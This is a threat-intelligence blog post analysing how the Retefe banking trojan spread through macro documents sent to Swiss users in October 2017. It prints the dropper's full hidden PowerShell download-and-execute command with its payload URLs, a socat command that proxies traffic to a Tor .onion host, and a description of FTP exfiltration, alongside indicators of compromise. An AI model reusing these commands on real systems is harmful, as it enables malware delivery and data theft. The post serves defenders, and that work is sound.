Wednesday, 11 October 2017

Retefe Banking Trojan Updates Spreading Mechanism

There is a change in the spreading strategy of Retefe Banking Trojan in October 2017 while targeting Swiss users.

Earlier in September 2017, we observed it being spread through LNK files embedded in the Documents. You can refer my previous blog on it here.

Attack Flow in September 2017 -> Doc -> LNK -> powershell -> Retefe

However, in the second week of October 2017, it is being spread through Macro based Documents:

Attack flow in October 2017 -> Doc -> Macro -> powershell -> Retefe

Filename Patterns for the Documents sent in the campaign:

Dokument_<digits>_mm_dd_yyyy.doc

The Document displays a warning in German which prompts the user to enable macros in order to view the Document contents as shown in Figure 1.


Figure 1

Execution Flow

At first, Macro launches Powershell to download the payload from either one of the following URLs:

hxxp://sergiocarfagna.it/uibojvr.exe
hxxp://abdulhamit.org/aqdbgpg.exe
hxxp://areanuova.it/mbahhhd.exe
hxxp://venturadatacom.com/vrqgpao.exe
hxxp://centralbaptistchurchnj.org/wruaoud.exe

Below is the relevant PowerShell script which does this:

powershell -WindowStyle Hidden $webclient = new-object System.Net.WebClient;$myurls = 'hxxp://sergiocarfagna.it/uibojvr.exe,hxxp://abdulhamit.org/aqdbgpg.exe,hxxp://areanuova.it/mbahhhd.exe,hxxp://venturadatacom.com/vrqgpao.exe,hxxp://centralbaptistchurchnj.org/wruaoud.exe'.Split(',');$path = $env:temp + '\65536.exe';foreach($myurl in $myurls){try{$webclient.DownloadFile($myurl.ToString(), $path);Start-Process $path;break;}catch{}}

The downloaded payload is then executed by Powershell.

In our case, MD5 hash of the downloaded payload is: 6233e426bd6ade588463d268897f813b

Indicators of Compromise

1. Drops a JavaScript file in the Path: C:\ProgramData\<random_name>.<random_extension>

Below are the details of the Config File used by the JavaScript:

Tor Servers: dl: ["igs67efmlcucq57u.onion","jotetnnmfzb42sdw.onion","ou47twzxgnicn7ga.onion","aulqkm5upaqmto3i.onion"]
cert: It's a Comodo signed Cert with the Serial Number:  00 ff 66 fa 4e 0b 64 80 0e
ps: Certificate Installation Script
pstp: Base64 encoded Powershell script which will install TOR and Socat installer.
pslog: Base64 encoded Powershell script which will collect information about the machine and upload through FTP to attacker's server: ftp.liwest.at/logs

Once again, we don't observe the usage of Eternal Blue Exploit and there is no pseb section inside the config section of JavaScript.

3. Drops the file: Microsoft.Win32.TaskScheduler.dll in the path: %temp%\random\

This DLL is leveraged by the PowerShell script for the purpose of setting up a Scheduled Task.

4. Drops a Powershell script in the path: C:\ProgramData\<random_name>.ps1

This Powershell Script will set up the scheduled task which will execute both TOR and Socat to setup the SOCKS proxy as shown below:

socat.exe tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:ou47twzxgnicn7ga.onion:80,socksport=9050

MD5 hashes of the Documents:

8d913b22cb04b32f0de40b31d19d19fc
9fe7ee427e0fd9d6e488c2d9aa117cf4
50908ab896dbcb2feafa3d27dd332ff6
a32501f73b532bc6a374bceec7616f2e
5ac86c732167d90bbe598598093ca4bd
4381c9ee65d66d3e0c7aebd99ec253f6
78a830743d1b02abad4b15de96174f39
26b76c6b56d5ef32b28865432ea2c08c

No comments:

Post a Comment